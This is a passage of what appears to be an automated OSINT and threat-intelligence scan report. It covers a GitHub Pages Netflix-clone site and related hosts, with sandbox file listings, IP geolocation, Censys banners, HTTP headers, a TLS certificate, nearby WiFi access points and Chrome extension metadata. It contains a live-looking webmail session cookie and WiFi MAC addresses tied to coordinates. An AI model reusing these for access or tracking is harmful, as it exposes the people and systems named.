"dir "; File: "urlref_httpskangbinkwon.github.iokangbinkwon-Netflix_clonecoding")\n Found string "<a href="https://devices.netflix.com/ko/" class="footer-link"><span" (Indicator: "dir "; File: "urlref_httpskangbinkwon.github.iokangbinkwon-Netflix_clonecoding")\n Found string "<a href="https://help.netflix.com/legal/termsofuse" class="footer-link"><span" (Indicator: "dir "; File: "urlref_httpskangbinkwon.github.iokangbinkwon-Netflix_clonecoding")\n Found string "<a href="https://help.netflix.com/legal/privacy" class="footer-link"><span class="lang"> </span></a>" (Indicator: "dir "; File: "urlref_httpskangbinkwon.github.iokangbinkwon-Netflix_clonecoding")\n Found string "<a href="https://help.netflix.com/legal/corpinfo" class="footer-link"><span class="lang"> </span></a>" (Indicator: "dir "; File: "urlref_httpskangbinkwon.github.iokangbinkwon-Netflix_clonecoding")\n Found string "<a href="https://help.netflix.com/ko/contactus" class="footer-link"><span class="lang"></span></a>" (Indicator: "dir "; File: "urlref_httpskangbinkwon.github.iokangbinkwon-Netflix_clonecoding")\n Found string "<a href="https://help.netflix.com/legal/notices" class="footer-link"><span class="lang"> </span></a>" (Indicator: "dir "; File: "urlref_httpskangbinkwon.github.iokangbinkwon-Netflix_clonecoding")\n Found string "<a href="https://www.netflix.com/kr/browse/genre/839338" class="footer-link"><span class="lang">Netflix" (Indicator: "dir "; File: "urlref_httpskangbinkwon.github.iokangbinkwon-Netflix_clonecoding")\n Found string "<div class="copy-text-block lang"> : korea@netflix.com</div>" (Indicator: "dir "; File: "urlref_httpskangbinkwon.github.iokangbinkwon-Netflix_clonecoding")'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-56', u'name': u'Drops files with image extension', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 0, u'threat_level': 0, u'type': 8, u'description': u'"card-01-hero-card_1_.jpg" has type "JPEG image data JFIF standard 1.01 aspect ratio density 1x1 segment length 16 progressive precision 8 2000x1125 components 3" and extension "jpg"\n "card-05_1_.png" has type "PNG image data 640 x 480 8-bit/color RGBA non-interlaced" and extension "png"\n "card-04-devices_1_.png" has type "PNG image data 640 x 480 8-bit/color RGBA non-interlaced" and extension "png"\n "cookieSetting_1_.png" has type "PNG image data 766 x 605 8-bit/color RGBA non-interlaced" and extension "png"\n "card-03-mobile_1_.jpg" has type "JPEG image data JFIF standard 1.01 aspect ratio density 1x1 segment length 16 progressive precision 8 640x480 components 3" and extension "jpg"\n "card-03-download_1_.gif" has type "GIF image data version 89a 100 x 100" and extension "gif"\n "card-03-boxshot_1_.png" has type "PNG image data 150 x 210 8-bit colormap non-interlaced" and extension "png"\n "card-02-tv_1_.png" has type "PNG image data 640 x 480 8-bit colormap non-interlaced" and extension "png"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "fa-light-300_1_.eot" has type "Embedded OpenType (EOT) Font Awesome 5 Pro Light family"- [targetUID: N/A]\n "fa-regular-400_1_.eot" has type "Embedded OpenType (EOT) Font Awesome 5 Pro Regular family"- [targetUID: N/A]\n "fa-solid-900_1_.eot" has type "Embedded OpenType (EOT) Font Awesome 5 Pro Solid family"- [targetUID: N/A]\n "card-01-hero-card_1_.jpg" has type "JPEG image data JFIF standard 1.01 aspect ratio density 1x1 segment length 16 progressive precision 8 2000x1125 components 3"- [targetUID: N/A]\n "card-05_1_.png" has type "PNG image data 640 x 480 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "all_1_.css" has type "ASCII text with very long lines"- [targetUID: N/A]\n "card-04-devices_1_.png" has type "PNG image data 640 x 480 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "cookieSetting_1_.png" has type "PNG image data 766 x 605 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "jquery-3.6.0.min_1_.js" has type "ASCII text with very long lines"- [targetUID: N/A]\n "card-03-mobile_1_.jpg" has type "JPEG image data JFIF standard 1.01 aspect ratio density 1x1 segment length 16 progressive precision 8 640x480 components 3"- [targetUID: N/A]\n "imagestore.dat" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Internet Explorer\\imagestore\\3mt7jhv\\imagestore.dat]- [targetUID: 00000000-00001748]\n "card-03-download_1_.gif" has type "GIF image data version 89a 100 x 100"- [targetUID: N/A]\n "card-03-boxshot_1_.png" has type "PNG image data 150 x 210 8-bit colormap non-interlaced"- [targetUID: N/A]\n "kangbinkwon-Netflix_clonecoding_1_.htm" has type "HTML document UTF-8 Unicode text with very long lines"- [targetUID: N/A]\n "en-US.4" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Internet Explorer\\DomainSuggestions\\en-US.4]- [targetUID: 00000000-00001748]\n "nficon2016_1_.ico" has type "MS Windows icon resource - 1 icon 64x64 32 bits/pixel"- [targetUID: N/A]\n "~DFF6F278D010A12D33.TMP" has type "data"- Location: [%TEMP%\\~DFF6F278D010A12D33.TMP]- [targetUID: 00000000-00001748]\n "~DF048C015CE4B792F4.TMP" has type "data"- Location: [%TEMP%\\~DF048C015CE4B792F4.TMP]- [targetUID: 00000000-00001748]\n "~DF0EACE11BF | 185.199.108.153 |
| 2023-05-12 02:45:41 | Raw Data from RIRs | No | AbstractAPI | 0 | 0 | 2 | 0 | None | {u'city': u'San Francisco (South Beach)', u'security': {u'is_vpn': False}, u'city_geoname_id': 5326621, u'region_geoname_id': 5332921, u'country': u'United States', u'region': u'California', u'connection': {u'connection_type': u'Corporate', u'autonomous_system_organization': u'FASTLY', u'isp_name': u'Fastly', u'organization_name': u'GitHub, Inc', u'autonomous_system_number': 54113}, u'continent_code': u'NA', u'currency': {u'currency_name': u'USD', u'currency_code': u'USD'}, u'flag': {u'svg': u'https://static.abstractapi.com/country-flags/US_flag.svg', u'png': u'https://static.abstractapi.com/country-flags/US_flag.png', u'unicode': u'U+1F1FA U+1F1F8', u'emoji': u'\U0001f1fa\U0001f1f8'}, u'postal_code': u'94107', u'longitude': -118.244, u'country_code': u'US', u'timezone': {u'abbreviation': u'PDT', u'gmt_offset': -7, u'is_dst': True, u'name': u'America/Los_Angeles', u'current_time': u'19:45:40'}, u'latitude': 34.0544, u'country_geoname_id': 6252001, u'continent_geoname_id': 6255149, u'country_is_eu': False, u'ip_address': u'185.199.110.153', u'continent': u'North America', u'region_iso_code': u'CA'} | 185.199.110.153 |
| 2023-05-12 02:46:39 | Malicious IP Address | Yes | Fraudguard | 0 | 1 | 2 | 0 | None | abuse_tracker (risk level: 4) [185.199.110.153] | 185.199.110.153 |
| 2023-05-12 02:54:03 | Open TCP Port Banner | No | Censys | 0 | 0 | 2 | 0 | None | HTTP/1.1 403 Forbidden
Date: <REDACTED>
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
X-Frame-Options: SAMEORIGIN
Referrer-Policy: same-origin
Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Vary: Accept-Encoding
Server: cloudflare
CF-RAY: 7c5a3af72b618723-ORD
Content-Encoding: gzip
| 172.67.135.9 |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | linksys (Net ID: 00:04:5A:EE:43:99) | 33.6170672,-111.90564645297056 |
| 2023-05-12 03:18:51 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | Lord Voldmodem (Net ID: F8:F5:32:63:56:0E) | 37.751, -97.822 |
| 2023-05-12 02:57:45 | SSL Certificate - Raw Data | No | Certificate Transparency | 1 | 0 | 1 | 0 | None | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
ff:0e:1e:a4:6f:55:f0:74:0e:b3:83:e1:07:c9:ea:93
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Google Trust Services LLC, CN=GTS CA 1P5
Validity
Not Before: Dec 14 04:12:07 2022 GMT
Not After : Mar 14 04:12:06 2023 GMT
Subject: CN=*.ayhu.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (2048 bit)
Modulus:
00:c0:3f:15:01:81:40:92:70:87:14:2c:25:01:e5:
a7:7f:11:ff:2d:2c:1c:6c:21:42:67:4e:30:48:bf:
c1:33:05:3f:32:e6:9d:27:08:a8:f7:db:7e:1a:19:
1c:aa:99:e8:d8:96:24:37:12:c6:a7:26:93:c0:67:
f6:d7:bf:fc:b8:23:1f:07:9c:8a:3a:8e:50:72:7a:
0b:43:ee:28:4c:e1:d7:7b:d8:4b:14:51:0a:cf:12:
03:a0:03:83:38:8b:68:c0:ba:0b:40:43:da:e2:c7:
fd:15:ad:f1:8a:ab:ad:d4:e1:28:d8:1f:91:4f:47:
05:38:6f:51:ba:b9:1e:e4:8f:9a:e9:d0:3a:3f:ae:
54:23:1b:cb:47:92:67:43:7b:78:2f:12:0d:48:e5:
86:54:03:05:53:71:94:6f:99:ca:50:b2:16:e3:59:
28:bd:e6:69:65:a7:0a:f0:76:9d:7c:ae:23:47:a4:
a0:54:01:4b:e1:a1:6c:56:66:e9:5f:20:b4:97:88:
6b:ae:96:63:a2:7f:14:d1:e7:4b:38:62:1b:57:9e:
5f:19:6f:4a:f8:f3:3f:ef:b1:e8:e9:b2:bb:cb:cb:
97:cd:3c:47:76:5d:e9:c6:1b:37:bc:84:42:29:b5:
65:be:97:34:7e:ff:74:79:85:f4:78:a1:2a:b1:60:
7b:21
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
FA:7E:08:50:07:6C:FD:DC:A8:68:45:A3:97:1C:E4:28:15:A8:2F:9D
X509v3 Authority Key Identifier:
keyid:D5:FC:9E:0D:DF:1E:CA:DD:08:97:97:6E:2B:C5:5F:C5:2B:F5:EC:B8
Authority Information Access:
OCSP - URI:http://ocsp.pki.goog/s/gts1p5/Yj_rNAxE9pQ
CA Issuers - URI:http://pki.goog/repo/certs/gts1p5.der
X509v3 Subject Alternative Name:
DNS:*.ayhu.xyz, DNS:ayhu.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.11129.2.5.3
X509v3 CRL Distribution Points:
Full Name:
URI:http://crls.pki.goog/gts1p5/ihFiAY-64YY.crl
CT Precertificate Poison: critical
NULL
Signature Algorithm: sha256WithRSAEncryption
45:c0:ed:fe:c5:44:0c:96:51:92:15:dc:2f:1d:e5:5e:4c:7f:
89:4a:3f:3d:94:64:76:5e:6b:ff:8c:03:7f:eb:ae:61:c0:89:
16:34:3c:a1:d5:87:98:35:53:48:52:1e:b4:61:d3:7d:9f:96:
bd:0f:71:c5:cf:b6:14:12:8a:01:59:97:dc:9b:84:b8:dd:00:
79:7f:7b:33:b7:24:69:1f:af:bd:66:ab:a1:a1:aa:55:6d:07:
62:b3:82:ac:fd:d6:53:44:01:3b:7c:3d:b9:8c:0c:8a:49:6d:
d5:e2:69:ce:ba:89:85:d0:a0:a7:81:a9:33:e3:76:b1:ed:fb:
71:7d:21:ea:82:98:93:f2:93:44:03:80:07:95:04:86:b6:71:
7f:1b:b4:73:ab:10:06:9e:6f:7b:f8:37:23:5b:20:c2:b0:1b:
8c:a9:f0:bb:c8:15:54:65:03:66:2b:65:2b:dd:c8:82:36:7d:
72:f9:d2:d6:5a:4a:b5:ef:a1:6b:50:f2:a1:c4:4a:6e:36:35:
c1:77:e5:2a:d0:28:89:59:f4:ec:d9:e0:96:66:a5:63:34:40:
69:7a:2a:6c:50:eb:81:e2:8a:ed:dd:bc:84:68:33:dd:56:7f:
0b:5f:af:bd:a2:2e:a4:1d:b3:12:b6:18:66:80:38:3d:ab:75:
96:5c:c6:6f
| ayhu.xyz |
| 2023-05-12 03:10:35 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 185.199.108.153:80 | 185.199.108.0/24 |
| 2023-05-12 02:59:49 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 2 | 0 | None | replayhubunlimited@gmail.com | [{"platform": "Chrome", "version": "1.0", "data": {"dangerousfunctions": {".insertBefore(": {"/tmp/agjliddikiapkkpacaacecphgdoplfop_1.0/content.js": [26]}}, "webstore": {"website": "https://replayhub.netlify.app/", "rating": 0, "privacy_policy": "", "last_updated": "2023-04-06", "name": "ReplayHub YouTube Looper", "price": "", "offered_by": "", "support_site": "https://replayhub.netlify.app/", "version": "", "address": "", "short_description": "A Chrome extension for looping YouTube videos.", "permission_warnings": [], "users": 2, "size": "12.84KiB", "type": "Extension", "email": "replayhubunlimited@gmail.com", "rating_users": 0, "icon": "https://lh3.googleusercontent.com/8hLe0teq-FvENQnMGTH5hbKoAgfgd5YttifZdgjiDupvDj0k9qP7enO7qNry3CWBXmZtrms-qMTbQk7rL--uibGNuA=w128-h128-e365-rj-sc0x00ffffff"}, "risk": {"metadata": {}, "total": 382, "csp": {"script-src": 1, "total": 377, "object-src": 1}, "webstore": {"privacy_policy": 1, "last_updated": 1, "users": 1, "address": 1, "total": 5, "rating_users": 1}}, "related": {"iginnfkhmmfhlkagcmpgofnjhanpmklb": {"rating": 4.602212, "users": 1000000, "platform": "", "short_description": "Play over 50 levels of box-jumping madness! Design and share your own levels.", "icon": "https://lh3.googleusercontent.com/muc6rdfnYlghXu2auI9B_xTDc3DjGTqJEn7crw2warPYn2ynoswSQzMskhdwzSa3aGn5ZtN1FS5zt7F2RQ7kvbiXXA=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 7866, "name": "Boxel Rebound"}, "coabfkgengacobjpmdlmmihhhfnhbjdm": {"rating": 4.712575, "users": 200000, "platform": "", "short_description": "Draw anything and anywhere in real-time, an Paint online. Take a Screenshot of what you have drawn.", "icon": "https://lh3.googleusercontent.com/ATk-HSHUYW94gfeX1-QViI3E-R9ayz6L-z1kaWZHTbODo35loCLAgQQ0Dd7Iyo_WVwIKwwV5CZMKy4xSAim78-i5=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 334, "name": "Paint Tool for Chrome"}, "pgniedifoejifjkndekolimjeclnokkb": {"rating": 4.152824, "users": 100000, "platform": "", "short_description": "Twitch culture wherever you go! This extension replaces all Twitch.tv emote phrases with their actual emoticons.", "icon": "https://lh3.googleusercontent.com/wpEAZCTc19k3y0XQ7kjngo0zY2gDblkGn4E-sp41P9QZJyERCUErowcPq7IYEJDop6Nxk-Mnn5lJDVHm5TTOWMBpRw=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 301, "name": "Global Twitch Emotes"}, "anflghppebdhjipndogapfagemgnlblh": {"rating": 4.5964994, "users": 1000000, "platform": "", "short_description": "Funny custom cursors for Chrome\u2122. Replace the default mouse cursor with a custom one from collections of cool and cute cursors.", "icon": "https://lh3.googleusercontent.com/9Sdk_yE3HogVcKV36GpAjo2WuW-KjYxE_OuLWGw_uQV55Nek_trNMqPxUADU2zteqtaZ2Nb6WOCWhbKODyPVCsfiFQ=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 14912, "name": "Cute Cursors - Custom Cursor for Chrome\u2122"}, "mghabdfikjldejcdcmclcmpcmknjahli": {"rating": 4.4349837, "users": 100000, "platform": "", "short_description": "Bass Boost makes videos, songs, movies and more sound awesome by boosting your speakers or headphones.", "icon": "https://lh3.googleusercontent.com/S_ICtgwu98_1zAUeun5CjylcOZeR8R6CbFeny166JgpLD7X9ny67sPfFH8CH93K9h-4KaEOAsQ23UT_gslYKLgjSdw=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 1515, "name": "Bass Boost: HD Audio"}, "mkccemimdjbojildcllapppfhphcfmkn": {"rating": 4.3464284, "users": 100000, "platform": "", "short_description": "Funny and highly addictive Piggybank idle cash clicker game! From poor pig to a money rain maker!", "icon": "https://lh3.googleusercontent.com/MTOgoa-4pnm2oT718hOzu0s7AyYRh2Hktwursb3vRiYoLJ_NhpZbNlcitb9yqgjsq58Oeml6yG8rdTJTFDnJQ1AdlhY=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 280, "name": "PiggyBank Money Clicker - Idle Game"}, "eekbbmglbfldjpgbmajenafphnfjonnc": {"rating": 4.0141845, "users": 300000, "platform": "", "short_description": "Create and save drawings at the click of a button.", "icon": "https://lh3.googleusercontent.com/9Ss9Et8Wqx2wynjcCgVgKCrWKgQALgDa_5dS8BrLamdoaJxE23RUqPzUCOtPl6Z_4E0cOjPLFWD-LRrIiPTV7A4d=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 282, "name": "TinySketch"}, "mmgjkfjlmdkmoipndaeombfnomjfgeff": {"rating": 4.7636366, "users": 200000, "platform": "", "short_description": "Boxel Golf is a multiplayer golf game packed with challenging courses, custom hats, and a powerful level builder.", "icon": "https://lh3.googleusercontent.com/CJluh5KxvX9BptxcgNfGygJ_FrarOtaAENIzJt_PhpyYyFLIKwtbx_ibaBFihgBFBnjNHBw6Zqf780ki2rEgsTL-=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 110, "name": "Boxel Golf"}, "akimgimeeoiognljlfchpbkpfbmeapkh": {"rating": 4.464241, "users": 300000, "platform": "", "short_description": "Art masterpieces from Google Arts & Culture in your browser tabs", "icon": "https://lh3.googleusercontent.com/vb_gZQ1M8DRLziSDF2orUqqOxfS0R41P6ivGjESV-Wayt2PhEjjECCjqt6cFYjmFOiJc3tPNRlaH--bS4YgJ2_bUF1A=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 1594, "name": "Google Arts & Culture"}, "ejgnolahdlcimijhloboakpjogbfdkkp": {"rating": 4.363104, "users": 200000, "platform": "", "short_description": "Meow is a virtual Cat pet who walks on your screen while you're browsing the web.", "icon": "https://lh3.googleusercontent.com/bGSk3Ww67wjSEwL0G3NUzjrmdwxCc07Zqg-DJ86TCU-9wslcEtutlHV8sn5gszDzOVilT4LhvdkXedoS8bvuCN-PJ5Y=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 1366, "name": "Meow, The Cat Pet"}, "ogadflejmplcdhcldlloonbiekhnlopp": {"rating": 4.765432, "users": 700000, "platform": "", "short_description": "Increase your max volume! Amplify sound by up to 600%. Control sound of any tab using audio equalizer.", "icon": "https://lh3.googleusercontent.com/i9-pwrYc-CjuOK3VW2wQHhWkBis2nQ_JtZLAqU36S-h3Ogx85OIj9ml3qLVEq_hb4mdaDCPm74nkFuLGN2AtvsQh=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 324, "name": "VolumeUp - Sound booster"}, "gebbhagfogifgggkldgodflihgfeippi": {"rating": 4.8502846, "users": 4000000, "platform": "", "short_description": "Returns ability to see dislikes", "icon": "https://lh3.googleusercontent.com/X0-M21C_VbWyXYuUjN55oyMDvOukjbzAxbs_WrUjwzsebWbyjFCIEchOtczI0DBvbyL9MUpuEWnghm19gF6dp8Vriw=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 14581, "name": "Return YouTube Dislike"}, "mjjgmlmpeaikcaajghilhnioimmaibon": {"rating": 4.636716, "users": 600000, "platform": "", "short_description": "Boxel 3D is the 3rd release of your favorite box jumping game made by the developers of Boxel Rebound.", "icon": "https://lh3.googleusercontent.com/wJh9K6xTW1upb8nCKtceJ62mE4BWbS7o4RiQpNnxoATQ8sn5w6RIYK9e5B6vPBp8Ve-rw9ZC9s-fTn7aiiH211Xd=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 1291, "name": "Boxel 3D"}, "cogmkaeijeflocngklepoknelfjpdjng": {"rating": 4.026706, "users": 100000, "platform": "", "short_description": "Powerful Video Downloader. Downloads most popular media formats like flash, videos, audios.", "icon": "https://lh3.googleusercontent.com/VlYizxdn50R6ZbmamuMJtMI0fLKaA1MQ9oZfGx3_Ewx-vHafh3aU3kcioZev8TGkc1bhrdEpYg9QRSlV2ip95SrWKw=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 337, "name": "Universal Video Downloader"}, "pjafcgbpdclmdeiipolenjgkikeldljl": {"rating": 4.6231885, "users": 100000, "platform": "", "short_description": "Play the piano in your browser", "icon": "https://lh3.googleusercontent.com/Qr_GTzNHNuRvSIDBRrVhDo_oe1X8lMQ4EeUvbHpXMn82tUSBxqqBrNTll4RwlrIAT8eT79cMTqE4XwkmlpsQXTeA=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 69, "name": "Chrome Piano"}, "dlnkkghpoaboifilieokcpoclbhpoclo": {"rating": 4.610895, "users": 400000, "platform": "", "short_description": "The classic Flappy Bird game offline version on your Google Chrome! Free online Flappy Bird plat on Desktop. Flappy for Chrome.", "icon": "https://lh3.googleusercontent.com/NJeftxVVijTjJAjU513yZrpTnqhUaifchPG7ueRV4tbYdvyhLFzaxrv78efd89uuDttH5JGOEYGzyIWwmUpQXfwXKw=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 257, "name": "Flappy Bird Offline. Desktop Version"}, "gokcmhknbfbkchaljcbjloaebnoblcnd": {"rating": 4.47541, "users": 100000, "platform": "", "short_description": "Welcome to Arcade Classics - a free browser extension with 9 games to play!", "icon": "https://lh3.googleusercontent.com/INSecUCn41xlC2ZJ-EtqFbnHRT6NQ7rwnT-A3AHFZBqvHUO5znb9qBco8HWaXTsM09TceC152h7LIesE_ncO3GktDw=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 61, "name": "Arcade Classics"}, "emeokgokialpjadjaoeiplmnkjoaegng": {"rating": 3.3394256, "users": 500000, "platform": "", "short_description": "Draw shapes, lines, and add text to live web pages and take screenshot.", "icon": "https://lh3.googleusercontent.com/Wafwq7jbZDxfLNCG587_eBMy91NkmSP2JFA3b4hWobkUAplS41SaW08gHYd8vcamJ1EPG5gQMPoQ_VDoVTNT9wH-KQ=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 766, "name": "Web Paint"}, "goiejopegncpjmocklmfiipofdbkhpic": {"rating": 4.5925927, "users": 100000, "platform": "", "short_description": "Doodle Jump! Jump and break your records!", "icon": "https://lh3.googleusercontent.com/sdyc5k0236GAl3UATyeaXTUVV7KzolMDZCdMo2ndFcYeMMX0hYvUNkCAf2hCBvnIZrd4NIjVJ41Huds2XMXL3qgo=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 27, "name": "Doodle Jump Ninja"}, "fadndhdgpmmaapbmfcknlfgcflmmmieb": {"rating": 4.466354, "users": 1000000, "platform": "", "short_description": "Use a variety of unique faces on Twitch!", "icon": "https://lh3.googleusercontent.com/qeMTob_QmnY3Mt8c-PnUxLs8nA82SW2VNylqMQ70aSRfpHCDISNXQI_4CIaW9N-kFyfhiAGYZ4Gy2zU4EaD5QxEEL-Y=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 639, "name": "FrankerFaceZ"}, "bmjmipppabdlpjccanalncobmbacckjn": {"rating": 4.889806, "users": 200000, "platform": "", "short_description": "Cool, cute and funny cursors for Chrome\u2122, choose from hundreds of options.", "icon": "https://lh3.googleusercontent.com/cFDN-1ehvX3Ru1s02Aq68gnGJB2PyGa3Z1OfGXK7gWrvPYJZy7q68KxLX4Y5peQfd6aVYzNab2Kp7ZIxcOy1N_mcO4E=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 2060, "name": "Cursor style - custom cursor for your browser"}, "ogdlpmhglpejoiomcodnpjnfgcpmgale": {"rating": 4.716016, "users": 6000000, "platform": "", "short_description": "Fun custom cursors for Chrome\u2122. Use a large collection of free cursors or upload your own.", "icon": "https://lh3.googleusercontent.com/H2MMZR0mOR25jQf_4GdtDTufefua3igDkUq9TXdzfdqHXxkp9zfuVp3gSqAKRWGG2urjM0PlMIdLuZWcWRAtlUvZ=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 42439, "name": "Custom |
| 2023-05-12 02:55:01 | Open TCP Port Banner | No | Censys | 0 | 0 | 2 | 0 | None | HTTP/1.1 403 Forbidden
Date: <REDACTED>
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
X-Frame-Options: SAMEORIGIN
Referrer-Policy: same-origin
Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Vary: Accept-Encoding
Server: cloudflare
CF-RAY: 7c5cc474dd9f2b1c-ORD
Content-Encoding: gzip
| 188.114.96.1 |
| 2023-05-12 02:55:11 | HTTP Headers | No | Censys | 0 | 0 | 2 | 0 | None | {"_encoding": {"Pragma": "DISPLAY_UTF8", "Set_Cookie": "DISPLAY_UTF8", "X_Content_Type_Options": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "X_Frame_Options": "DISPLAY_UTF8", "Cache_Control": "DISPLAY_UTF8"}, "Pragma": ["no-cache"], "Set_Cookie": ["webmailrelogin=no; HttpOnly; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; port=2096; secure", "webmailsession=%3aJ6wQNgi5mDSbd8Aj%2ccc122e301037955ff583c00e21431728; HttpOnly; path=/; port=2096; secure", "roundcube_sessid=expired; HttpOnly; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; port=2096; secure", "roundcube_sessauth=expired; HttpOnly; domain=87.248.157.102; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; port=2096; secure", "Horde=expired; HttpOnly; domain=.87.248.157.102; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; port=2096; secure", "horde_secret_key=expired; HttpOnly; domain=.87.248.157.102; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; port=2096; secure", "Horde=expired; HttpOnly; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; port=2096; secure", "Horde=expired; HttpOnly; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/horde; port=2096; secure", "PPA_ID=expired; HttpOnly; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; port=2096; secure", "imp_key=expired; HttpOnly; domain=87.248.157.102; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; port=2096; secure", "Horde=expired; HttpOnly; domain=.87.248.157.102; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; port=2096", "horde_secret_key=expired; HttpOnly; domain=.87.248.157.102; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; port=2096", "roundcube_cookies=enabled; HttpOnly; expires=Thu, 09-May-2024 16:40:03 GMT; path=/; port=2096; secure"], "X_Content_Type_Options": ["nosniff"], "Connection": ["close"], "Content_Type": ["text/html; charset=\"utf-8\""], "Date": ["<REDACTED>"], "X_Frame_Options": ["SAMEORIGIN"], "Cache_Control": ["no-cache, no-store, must-revalidate, private", "no-cache, no-store, must-revalidate, private"]} | 87.248.157.102 |
| 2023-05-12 02:54:23 | HTTP Headers | No | Web Spider | 2 | 0 | 4 | 0 | None | {"x-content-type-options": "nosniff", "content-encoding": "gzip", "transfer-encoding": "chunked", "expires": "Fri, 12 May 2023 04:54:23 GMT", "vary": "Accept-Encoding", "server": "cloudflare", "last-modified": "Fri, 28 Apr 2023 14:11:18 GMT", "connection": "keep-alive", "etag": "W/\"644bd406-19c8\"", "cache-control": "max-age=7200, public", "date": "Fri, 12 May 2023 02:54:23 GMT", "cf-ray": "7c5f60721cb70f8d-EWR", "content-type": "text/css", "x-frame-options": "DENY"} | https://www.ayhu.xyz/cdn-cgi/styles/challenges.css |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | linksys (Net ID: 00:16:B6:17:24:0D) | 32.8608, -79.9746 |
| 2023-05-12 03:18:59 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | linksys (Net ID: 00:04:5A:DB:DA:99) | 33.617190550339146,-111.90827887019054 |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | Intel Gateway (Net ID: 00:01:E6:96:87:21) | 39.0469, -77.4903 |
| 2023-05-12 03:18:57 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | grasshopper2 (Net ID: 00:01:38:5A:88:28) | 37.780462,-122.390564 |
| 2023-05-12 02:53:49 | Open TCP Port Banner | No | Censys | 0 | 0 | 2 | 0 | None | HTTP/1.1 404 Not Found
Connection: keep-alive
Content-Length: 5142
Server: GitHub.com
Content-Type: text/html; charset=utf-8
ETag: W/"64556a8c-239b"
Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; img-src data:; connect-src 'self'
Content-Encoding: gzip
X-GitHub-Request-Id: A5D4:2C9F:2F6913:34928C:645D0975
Accept-Ranges: bytes
Date: <REDACTED>
Via: 1.1 varnish
Age: 0
X-Served-By: cache-gig2250052-GIG
X-Cache: MISS
X-Cache-Hits: 0
X-Timer: S1683818869.392299,VS0,VE127
Vary: Accept-Encoding
X-Fastly-Request-ID: 770beefb8a8eea06db7f3e4b2376459b2d1c2cbe
| 2606:50c0:8000::153 |
